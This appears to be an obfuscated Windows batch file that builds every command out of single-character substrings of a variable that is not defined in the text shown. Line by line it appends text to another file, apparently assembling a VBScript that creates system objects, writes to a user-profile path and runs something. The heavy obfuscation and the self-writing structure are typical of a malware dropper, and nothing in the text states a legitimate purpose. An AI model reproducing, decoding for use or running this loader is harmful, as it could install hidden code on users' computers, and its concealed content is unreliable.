ocvdubf:~31,1%%ocvdubf:~25,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~67,1%%ocvdubf:~40,1%%ocvdubf:~45,1%%ocvdubf:~55,1%%ocvdubf:~0,1%%ocvdubf:~5,1%%ocvdubf:~6,1%%ocvdubf:~69,1%%ocvdubf:~67,1%%ocvdubf:~51,1%%ocvdubf:~52,1%%ocvdubf:~50,1%%ocvdubf:~42,1%%ocvdubf:~67,1%%ocvdubf:~51,1%%ocvdubf:~52,1%%ocvdubf:~50,1%%ocvdubf:~42,1%%ocvdubf:~53,1%%ocvdubf:~40,1%%ocvdubf:~67,1%%ocvdubf:~40,1%%ocvdubf:~45,1%%ocvdubf:~55,1%%ocvdubf:~0,1%%ocvdubf:~5,1%%ocvdubf:~6,1%%ocvdubf:~69,1%%ocvdubf:~67,1%%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~68,1%%ocvdubf:~61,1%%ocvdubf:~50,1%%ocvdubf:~49,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~67,1%%ocvdubf:~40,1%%ocvdubf:~45,1%%ocvdubf:~55,1%%ocvdubf:~0,1%%ocvdubf:~5,1%%ocvdubf:~6,1%%ocvdubf:~69,1%%ocvdubf:~67,1%%ocvdubf:~52,1%%ocvdubf:~58,1%%ocvdubf:~57,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~67,1%%ocvdubf:~40,1%%ocvdubf:~45,1%%ocvdubf:~55,1%%ocvdubf:~0,1%%ocvdubf:~5,1%%ocvdubf:~6,1%%ocvdubf:~69,1%%ocvdubf:~67,1%%ocvdubf:~1,1%%ocvdubf:~1,1%
>>%uwcrnxl%  %ocvdubf:~30,1%%ocvdubf:~42,1%%ocvdubf:~57,1%%ocvdubf:~65,1%%ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~30,1%%ocvdubf:~45,1%%ocvdubf:~42,1%%ocvdubf:~49,1%%ocvdubf:~49,1%%ocvdubf:~65,1%=%ocvdubf:~65,1%%ocvdubf:~25,1%%ocvdubf:~52,1%%ocvdubf:~57,1%%ocvdubf:~45,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~44,1%
>>%uwcrnxl%  %ocvdubf:~15,1%%ocvdubf:~42,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~12,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~52,1%%ocvdubf:~58,1%%ocvdubf:~57,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%
>>%uwcrnxl%  %ocvdubf:~16,1%%ocvdubf:~51,1%%ocvdubf:~41,1%%ocvdubf:~65,1%%ocvdubf:~17,1%%ocvdubf:~58,1%%ocvdubf:~51,1%%ocvdubf:~40,1%%ocvdubf:~57,1%%ocvdubf:~46,1%%ocvdubf:~52,1%%ocvdubf:~51,1%
>>%uwcrnxl%  %ocvdubf:~17,1%%ocvdubf:~58,1%%ocvdubf:~51,1%%ocvdubf:~40,1%%ocvdubf:~57,1%%ocvdubf:~46,1%%ocvdubf:~52,1%%ocvdubf:~51,1%%ocvdubf:~65,1%%ocvdubf:~53,1%%ocvdubf:~42,1%%ocvdubf:~44,1%%ocvdubf:~38,1%%ocvdubf:~42,1%%ocvdubf:~61,1%%ocvdubf:~42,1%%ocvdubf:~0,1%%ocvdubf:~53,1%%ocvdubf:~38,1%%ocvdubf:~56,1%%ocvdubf:~57,1%%ocvdubf:~38,1%%ocvdubf:~69,1%
>>%uwcrnxl%  %ocvdubf:~30,1%%ocvdubf:~42,1%%ocvdubf:~57,1%%ocvdubf:~65,1%%ocvdubf:~52,1%%ocvdubf:~17,1%%ocvdubf:~30,1%%ocvdubf:~65,1%=%ocvdubf:~65,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~42,1%%ocvdubf:~38,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~26,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~42,1%%ocvdubf:~40,1%%ocvdubf:~57,1%%ocvdubf:~0,1%%ocvdubf:~1,1%%ocvdubf:~30,1%%ocvdubf:~40,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~53,1%%ocvdubf:~57,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~44,1%%ocvdubf:~64,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~30,1%%ocvdubf:~62,1%%ocvdubf:~56,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~50,1%%ocvdubf:~26,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~42,1%%ocvdubf:~40,1%%ocvdubf:~57,1%%ocvdubf:~1,1%%ocvdubf:~69,1%
>>%uwcrnxl%  %ocvdubf:~17,1%%ocvdubf:~52,1%%ocvdubf:~55,1%%ocvdubf:~65,1%%ocvdubf:~16,1%%ocvdubf:~38,1%%ocvdubf:~40,1%%ocvdubf:~45,1%%ocvdubf:~65,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~65,1%%ocvdubf:~52,1%%ocvdubf:~17,1%%ocvdubf:~30,1%%ocvdubf:~64,1%%ocvdubf:~18,1%%ocvdubf:~42,1%%ocvdubf:~57,1%%ocvdubf:~17,1%%ocvdubf:~52,1%%ocvdubf:~49,1%%ocvdubf:~41,1%%ocvdubf:~42,1%%ocvdubf:~55,1%%ocvdubf:~0,1%%ocvdubf:~53,1%%ocvdubf:~38,1%%ocvdubf:~56,1%%ocvdubf:~57,1%%ocvdubf:~38,1%%ocvdubf:~69,1%%ocvdubf:~64,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~56,1%
>>%uwcrnxl%  %ocvdubf:~20,1%%ocvdubf:~43,1%%ocvdubf:~65,1%%ocvdubf:~52,1%%ocvdubf:~17,1%%ocvdubf:~30,1%%ocvdubf:~64,1%%ocvdubf:~18,1%%ocvdubf:~42,1%%ocvdubf:~57,1%%ocvdubf:~16,1%%ocvdubf:~61,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~51,1%%ocvdubf:~56,1%%ocvdubf:~46,1%%ocvdubf:~52,1%%ocvdubf:~51,1%%ocvdubf:~25,1%%ocvdubf:~38,1%%ocvdubf:~50,1%%ocvdubf:~42,1%%ocvdubf:~0,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~69,1%=%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~42,1%%ocvdubf:~61,1%%ocvdubf:~42,1%%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~31,1%%ocvdubf:~45,1%%ocvdubf:~42,1%%ocvdubf:~51,1%
>>%uwcrnxl%  %ocvdubf:~65,1%%ocvdubf:~55,1%%ocvdubf:~42,1%%ocvdubf:~56,1%%ocvdubf:~58,1%%ocvdubf:~49,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~61,1%%ocvdubf:~42,1%%ocvdubf:~65,1%=%ocvdubf:~65,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~65,1%
>>%uwcrnxl%  %ocvdubf:~65,1%%ocvdubf:~16,1%%ocvdubf:~61,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~65,1%%ocvdubf:~17,1%%ocvdubf:~58,1%%ocvdubf:~51,1%%ocvdubf:~40,1%%ocvdubf:~57,1%%ocvdubf:~46,1%%ocvdubf:~52,1%%ocvdubf:~51,1%
>>%uwcrnxl%  %ocvdubf:~65,1%%ocvdubf:~16,1%%ocvdubf:~51,1%%ocvdubf:~41,1%%ocvdubf:~65,1%%ocvdubf:~20,1%%ocvdubf:~43,1%
>>%uwcrnxl%  %ocvdubf:~25,1%%ocvdubf:~42,1%%ocvdubf:~61,1%%ocvdubf:~57,1%
>>%uwcrnxl%  %ocvdubf:~16,1%%ocvdubf:~51,1%%ocvdubf:~41,1%%ocvdubf:~65,1%%ocvdubf:~17,1%%ocvdubf:~58,1%%ocvdubf:~51,1%%ocvdubf:~40,1%%ocvdubf:~57,1%%ocvdubf:~46,1%%ocvdubf:~52,1%%ocvdubf:~51,1%
>>%uwcrnxl%  %ocvdubf:~30,1%%ocvdubf:~42,1%%ocvdubf:~57,1%%ocvdubf:~65,1%%ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~25,1%%ocvdubf:~42,1%%ocvdubf:~57,1%%ocvdubf:~65,1%=%ocvdubf:~65,1%%ocvdubf:~34,1%%ocvdubf:~30,1%%ocvdubf:~40,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~53,1%%ocvdubf:~57,1%%ocvdubf:~64,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~42,1%%ocvdubf:~38,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~26,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~42,1%%ocvdubf:~40,1%%ocvdubf:~57,1%%ocvdubf:~0,1%%ocvdubf:~1,1%%ocvdubf:~34,1%%ocvdubf:~30,1%%ocvdubf:~40,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~53,1%%ocvdubf:~57,1%%ocvdubf:~64,1%%ocvdubf:~25,1%%ocvdubf:~42,1%%ocvdubf:~57,1%%ocvdubf:~60,1%%ocvdubf:~52,1%%ocvdubf:~55,1%%ocvdubf:~48,1%%ocvdubf:~1,1%%ocvdubf:~69,1%
>>%uwcrnxl%  %ocvdubf:~53,1%%ocvdubf:~38,1%%ocvdubf:~56,1%%ocvdubf:~57,1%%ocvdubf:~38,1%%ocvdubf:~53,1%%ocvdubf:~55,1%%ocvdubf:~52,1%%ocvdubf:~44,1%%ocvdubf:~55,1%%ocvdubf:~38,1%%ocvdubf:~50,1%%ocvdubf:~65,1%=%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~14,1%:\%ocvdubf:~32,1%%ocvdubf:~56,1%%ocvdubf:~42,1%%ocvdubf:~55,1%%ocvdubf:~56,1%\%ocvdubf:~1,1%%ocvdubf:~67,1%%ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~25,1%%ocvdubf:~42,1%%ocvdubf:~57,1%%ocvdubf:~64,1%%ocvdubf:~32,1%%ocvdubf:~56,1%%ocvdubf:~42,1%%ocvdubf:~55,1%%ocvdubf:~25,1%%ocvdubf:~38,1%%ocvdubf:~50,1%%ocvdubf:~42,1%%ocvdubf:~67,1%%ocvdubf:~1,1%\%ocvdubf:~61,1%%ocvdubf:~57,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~38,1%\%ocvdubf:~1,1%
>>%uwcrnxl%  %ocvdubf:~17,1%%ocvdubf:~58,1%%ocvdubf:~51,1%%ocvdubf:~40,1%%ocvdubf:~57,1%%ocvdubf:~46,1%%ocvdubf:~52,1%%ocvdubf:~51,1%%ocvdubf:~65,1%%ocvdubf:~42,1%%ocvdubf:~61,1%%ocvdubf:~57,1%%ocvdubf:~55,1%%ocvdubf:~38,1%%ocvdubf:~40,1%%ocvdubf:~57,1%%ocvdubf:~0,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~25,1%%ocvdubf:~38,1%%ocvdubf:~50,1%%ocvdubf:~42,1%,%ocvdubf:~65,1%%ocvdubf:~27,1%%ocvdubf:~38,1%%ocvdubf:~56,1%%ocvdubf:~57,1%%ocvdubf:~38,1%%ocvdubf:~69,1%
>>%uwcrnxl%  %ocvdubf:~15,1%%ocvdubf:~46,1%%ocvdubf:~50,1%%ocvdubf:~65,1%%ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~30,1%%ocvdubf:~45,1%%ocvdubf:~42,1%%ocvdubf:~49,1%%ocvdubf:~49,1%
>>%uwcrnxl%  %ocvdubf:~15,1%%ocvdubf:~46,1%%ocvdubf:~50,1%%ocvdubf:~65,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~56,1%%ocvdubf:~20,1%%ocvdubf:~51,1%%ocvdubf:~37,1%%ocvdubf:~46,1%%ocvdubf:~53,1%
>>%uwcrnxl%  %ocvdubf:~56,1%%ocvdubf:~42,1%%ocvdubf:~57,1%%ocvdubf:~65,1%%ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~30,1%%ocvdubf:~45,1%%ocvdubf:~42,1%%ocvdubf:~49,1%%ocvdubf:~49,1%%ocvdubf:~65,1%=%ocvdubf:~65,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~42,1%%ocvdubf:~38,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~26,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~42,1%%ocvdubf:~40,1%%ocvdubf:~57,1%%ocvdubf:~0,1%%ocvdubf:~1,1%%ocvdubf:~30,1%%ocvdubf:~45,1%%ocvdubf:~42,1%%ocvdubf:~49,1%%ocvdubf:~49,1%%ocvdubf:~64,1%%ocvdubf:~12,1%%ocvdubf:~53,1%%ocvdubf:~53,1%%ocvdubf:~49,1%%ocvdubf:~46,1%%ocvdubf:~40,1%%ocvdubf:~38,1%%ocvdubf:~57,1%%ocvdubf:~46,1%%ocvdubf:~52,1%%ocvdubf:~51,1%%ocvdubf:~1,1%%ocvdubf:~69,1%
>>%uwcrnxl%  %ocvdubf:~56,1%%ocvdubf:~42,1%%ocvdubf:~57,1%%ocvdubf:~65,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~56,1%%ocvdubf:~20,1%%ocvdubf:~51,1%%ocvdubf:~37,1%%ocvdubf:~46,1%%ocvdubf:~53,1%=%ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~30,1%%ocvdubf:~45,1%%ocvdubf:~42,1%%ocvdubf:~49,1%%ocvdubf:~49,1%%ocvdubf:~64,1%%ocvdubf:~25,1%%ocvdubf:~38,1%%ocvdubf:~50,1%%ocvdubf:~42,1%%ocvdubf:~30,1%%ocvdubf:~53,1%%ocvdubf:~38,1%%ocvdubf:~40,1%%ocvdubf:~42,1%%ocvdubf:~0,1%%ocvdubf:~65,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~25,1%%ocvdubf:~38,1%%ocvdubf:~50,1%%ocvdubf:~42,1%%ocvdubf:~69,1%%ocvdubf:~64,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~50,1%%ocvdubf:~56,1%
>>%uwcrnxl%  %ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~30,1%%ocvdubf:~45,1%%ocvdubf:~42,1%%ocvdubf:~49,1%%ocvdubf:~49,1%%ocvdubf:~64,1%%ocvdubf:~25,1%%ocvdubf:~38,1%%ocvdubf:~50,1%%ocvdubf:~42,1%%ocvdubf:~30,1%%ocvdubf:~53,1%%ocvdubf:~38,1%%ocvdubf:~40,1%%ocvdubf:~42,1%%ocvdubf:~0,1%%ocvdubf:~27,1%%ocvdubf:~38,1%%ocvdubf:~56,1%%ocvdubf:~57,1%%ocvdubf:~38,1%%ocvdubf:~69,1%%ocvdubf:~64,1%%ocvdubf:~14,1%%ocvdubf:~52,1%%ocvdubf:~53,1%%ocvdubf:~62,1%%ocvdubf:~19,1%%ocvdubf:~42,1%%ocvdubf:~55,1%%ocvdubf:~42,1%%ocvdubf:~0,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~56,1%%ocvdubf:~20,1%%ocvdubf:~51,1%%ocvdubf:~37,1%%ocvdubf:~46,1%%ocvdubf:~53,1%%ocvdubf:~69,1%
>>%uwcrnxl%  %ocvdubf:~16,1%%ocvdubf:~51,1%%ocvdubf:~41,1%%ocvdubf:~65,1%%ocvdubf:~17,1%%ocvdubf:~58,1%%ocvdubf:~51,1%%ocvdubf:~40,1%%ocvdubf:~57,1%%ocvdubf:~46,1%%ocvdubf:~52,1%%ocvdubf:~51,1%
>>%uwcrnxl%  %ocvdubf:~17,1%%ocvdubf:~58,1%%ocvdubf:~51,1%%ocvdubf:~40,1%%ocvdubf:~57,1%%ocvdubf:~46,1%%ocvdubf:~52,1%%ocvdubf:~51,1%%ocvdubf:~65,1%%ocvdubf:~30,1%%ocvdubf:~38,1%%ocvdubf:~59,1%%ocvdubf:~42,1%%ocvdubf:~13,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~38,1%%ocvdubf:~55,1%%ocvdubf:~62,1%%ocvdubf:~15,1%%ocvdubf:~38,1%%ocvdubf:~57,1%%ocvdubf:~38,1%%ocvdubf:~0,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~25,1%%ocvdubf:~38,1%%ocvdubf:~50,1%%ocvdubf:~42,1%,%ocvdubf:~65,1%%ocvdubf:~15,1%%ocvdubf:~38,1%%ocvdubf:~57,1%%ocvdubf:~38,1%%ocvdubf:~69,1%
>>%uwcrnxl%  %ocvdubf:~14,1%%ocvdubf:~52,1%%ocvdubf:~51,1%%ocvdubf:~56,1%%ocvdubf:~57,1%%ocvdubf:~65,1%%ocvdubf:~38,1%%ocvdubf:~41,1%%ocvdubf:~31,1%%ocvdubf:~62,1%%ocvdubf:~53,1%%ocvdubf:~42,1%%ocvdubf:~31,1%%ocvdubf:~42,1%%ocvdubf:~61,1%%ocvdubf:~57,1%%ocvdubf:~65,1%=%ocvdubf:~65,1%%ocvdubf:~3,1%
>>%uwcrnxl%  %ocvdubf:~14,1%%ocvdubf:~52,1%%ocvdubf:~51,1%%ocvdubf:~56,1%%ocvdubf:~57,1%%ocvdubf:~65,1%%ocvdubf:~38,1%%ocvdubf:~41,1%%ocvdubf:~30,1%%ocvdubf:~38,1%%ocvdubf:~59,1%%ocvdubf:~42,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~42,1%%ocvdubf:~38,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~26,1%%ocvdubf:~59,1%%ocvdubf:~42,1%%ocvdubf:~55,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%=%ocvdubf:~65,1%%ocvdubf:~4,1%
>>%uwcrnxl%  %ocvdubf:~15,1%%ocvdubf:~46,1%%ocvdubf:~50,1%%ocvdubf:~65,1%%ocvdubf:~13,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~38,1%%ocvdubf:~55,1%%ocvdubf:~62,1%%ocvdubf:~30,1%%ocvdubf:~57,1%%ocvdubf:~55,1%%ocvdubf:~42,1%%ocvdubf:~38,1%%ocvdubf:~50,1%
>>%uwcrnxl%  %ocvdubf:~30,1%%ocvdubf:~42,1%%ocvdubf:~57,1%%ocvdubf:~65,1%%ocvdubf:~13,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~38,1%%ocvdubf:~55,1%%ocvdubf:~62,1%%ocvdubf:~30,1%%ocvdubf:~57,1%%ocvdubf:~55,1%%ocvdubf:~42,1%%ocvdubf:~38,1%%ocvdubf:~50,1%%ocvdubf:~65,1%=%ocvdubf:~65,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~42,1%%ocvdubf:~38,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~26,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~42,1%%ocvdubf:~40,1%%ocvdubf:~57,1%%ocvdubf:~0,1%%ocvdubf:~1,1%%ocvdubf:~12,1%%ocvdubf:~15,1%%ocvdubf:~26,1%%ocvdubf:~15,1%%ocvdubf:~13,1%%ocvdubf:~64,1%%ocvdubf:~30,1%%ocvdubf:~57,1%%ocvdubf:~55,1%%ocvdubf:~42,1%%ocvdubf:~38,1%%ocvdubf:~50,1%%ocvdubf:~1,1%%ocvdubf:~69,1%
>>%uwcrnxl%  %ocvdubf:~13,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~38,1%%ocvdubf:~55,1%%ocvdubf:~62,1%%ocvdubf:~30,1%%ocvdubf:~57,1%%ocvdubf:~55,1%%ocvdubf:~42,1%%ocvdubf:~38,1%%ocvdubf:~50,1%%ocvdubf:~64,1%%ocvdubf:~31,1%%ocvdubf:~62,1%%ocvdubf:~53,1%%ocvdubf:~42,1%%ocvdubf:~65,1%=%ocvdubf:~65,1%%ocvdubf:~38,1%%ocvdubf:~41,1%%ocvdubf:~31,1%%ocvdubf:~62,1%%ocvdubf:~53,1%%ocvdubf:~42,1%%ocvdubf:~31,1%%ocvdubf:~42,1%%ocvdubf:~61,1%%ocvdubf:~57,1%
>>%uwcrnxl%  %ocvdubf:~13,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~38,1%%ocvdubf:~55,1%%ocvdubf:~62,1%%ocvdubf:~30,1%%ocvdubf:~57,1%%ocvdubf:~55,1%%ocvdubf:~42,1%%ocvdubf:~38,1%%ocvdubf:~50,1%%ocvdubf:~64,1%%ocvdubf:~26,1%%ocvdubf:~53,1%%ocvdubf:~42,1%%ocvdubf:~51,1%
>>%uwcrnxl%  %ocvdubf:~13,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~38,1%%ocvdubf:~55,1%%ocvdubf:~62,1%%ocvdubf:~30,1%%ocvdubf:~57,1%%ocvdubf:~55,1%%ocvdubf:~42,1%%ocvdubf:~38,1%%ocvdubf:~50,1%%ocvdubf:~64,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~15,1%%ocvdubf:~38,1%%ocvdubf:~57,1%%ocvdubf:~38,1%
>>%uwcrnxl%  %ocvdubf:~13,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~38,1%%ocvdubf:~55,1%%ocvdubf:~62,1%%ocvdubf:~30,1%%ocvdubf:~57,1%%ocvdubf:~55,1%%ocvdubf:~42,1%%ocvdubf:~38,1%%ocvdubf:~50,1%%ocvdubf:~64,1%%ocvdubf:~30,1%%ocvdubf:~38,1%%ocvdubf:~59,1%%ocvdubf:~42,1%%ocvdubf:~31,1%%ocvdubf:~52,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~65,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~25,1%%ocvdubf:~38,1%%ocvdubf:~50,1%%ocvdubf:~42,1%,%ocvdubf:~65,1%%ocvdubf:~38,1%%ocvdubf:~41,1%%ocvdubf:~30,1%%ocvdubf:~38,1%%ocvdubf:~59,1%%ocvdubf:~42,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~42,1%%ocvdubf:~38,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~26,1%%ocvdubf:~59,1%%ocvdubf:~42,1%%ocvdubf:~55,1%%ocvdubf:~34,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~57,1%%ocvdubf:~42,1%
>>%uwcrnxl%  %ocvdubf:~16,1%%ocvdubf:~51,1%%ocvdubf:~41,1%%ocvdubf:~65,1%%ocvdubf:~17,1%%ocvdubf:~58,1%%ocvdubf:~51,1%%ocvdubf:~40,1%%ocvdubf:~57,1%%ocvdubf:~46,1%%ocvdubf:~52,1%%ocvdubf:~51,1%
>>%uwcrnxl%  %ocvdubf:~30,1%%ocvdubf:~42,1%%ocvdubf:~57,1%%ocvdubf:~65,1%%ocvdubf:~43,1%%ocvdubf:~56,1%%ocvdubf:~52,1%%ocvdubf:~65,1%=%ocvdubf:~65,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~42,1%%ocvdubf:~38,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~26,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~42,1%%ocvdubf:~40,1%%ocvdubf:~57,1%%ocvdubf:~0,1%%ocvdubf:~1,1%%ocvdubf:~30,1%%ocvdubf:~40,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~53,1%%ocvdubf:~57,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~44,1%%ocvdubf:~64,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~30,1%%ocvdubf:~62,1%%ocvdubf:~56,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~50,1%%ocvdubf:~26,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~42,1%%ocvdubf:~40,1%%ocvdubf:~57,1%%ocvdubf:~1,1%%ocvdubf:~69,1%
>>%uwcrnxl%  %ocvdubf:~20,1%%ocvdubf:~43,1%%ocvdubf:~65,1%%ocvdubf:~0,1%%ocvdubf:~43,1%%ocvdubf:~56,1%%ocvdubf:~52,1%%ocvdubf:~64,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~16,1%%ocvdubf:~61,1%%ocvdubf:~46,1%%ocvdubf:~56,1%%ocvdubf:~57,1%%ocvdubf:~56,1%%ocvdubf:~0,1%%ocvdubf:~53,1%%ocvdubf:~38,1%%ocvdubf:~56,1%%ocvdubf:~57,1%%ocvdubf:~38,1%%ocvdubf:~53,1%%ocvdubf:~55,1%%ocvdubf:~52,1%%ocvdubf:~44,1%%ocvdubf:~55,1%%ocvdubf:~38,1%%ocvdubf:~50,1%%ocvdubf:~69,1%%ocvdubf:~69,1%%ocvdubf:~65,1%%ocvdubf:~31,1%%ocvdubf:~45,1%%ocvdubf:~42,1%%ocvdubf:~51,1%
>>%uwcrnxl%  %ocvdubf:~65,1%%ocvdubf:~65,1%%ocvdubf:~65,1%%ocvdubf:~50,1%%ocvdubf:~56,1%%ocvdubf:~44,1%%ocvdubf:~65,1%=%ocvdubf:~65,1%%ocvdubf:~53,1%%ocvdubf:~38,1%%ocvdubf:~56,1%%ocvdubf:~57,1%%ocvdubf:~38,1%%ocvdubf:~53,1%%ocvdubf:~55,1%%ocvdubf:~52,1%%ocvdubf:~44,1%%ocvdubf:~55,1%%ocvdubf:~38,1%%ocvdubf:~50,1%%ocvdubf:~65,1%%ocvdubf:~67,1%%ocvdubf:~65,1%%ocvdubf:~1,1%%ocvdubf:~65,1%%ocvdubf:~42,1%%ocvdubf:~61,1%%ocvdubf:~46,1%%ocvdubf:~56,1%%ocvdubf:~57,1%%ocvdubf:~56,1%%ocvdubf:~64,1%%ocvdubf:~1,1%
>>%uwcrnxl%  %ocvdubf:~16,1%%ocvdubf:~49,1%%ocvdubf:~56,1%%ocvdubf:~42,1%
>>%uwcrnxl%  %ocvdubf:~30,1%%ocvdubf:~42,1%%ocvdubf:~57,1%%ocvdubf:~65,1%%ocvdubf:~52,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~17,1%%ocvdubf:~30,1%%ocvdubf:~26,1%%ocvdubf:~65,1%=%ocvdubf:~65,1%%ocvdubf:~14,1%%ocvdubf:~55,1%%ocvdubf:~42,1%%ocvdubf:~38,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~26,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~42,1%%ocvdubf:~40,1%%ocvdubf:~57,1%%ocvdubf:~0,1%%ocvdubf:~1,1%%ocvdubf:~30,1%%ocvdubf:~40,1%%ocvdubf:~55,1%%ocvdubf:~46,1%%ocvdubf:~53,1%%ocvdubf:~57,1%%ocvdubf:~46,1%%ocvdubf:~51,1%%ocvdubf:~44,1%%ocvdubf:~64,1%%ocvdubf:~17,1%%ocvdubf:~46,1%%ocvdubf:~49,1%%ocvdubf:~42,1%%ocvdubf:~30,1%%ocvdubf:~62,1%%ocvdubf:~56,1%%ocvdubf:~57,1%%ocvdubf:~42,1%%ocvdubf:~50,1%%ocvdubf:~26,1%%ocvdubf:~39,1%%ocvdubf:~47,1%%ocvdubf:~42,1%%ocvdubf:~40,1%%ocvdubf:~57,1%%ocvdubf:~1,1%%ocvdubf:~69,1%
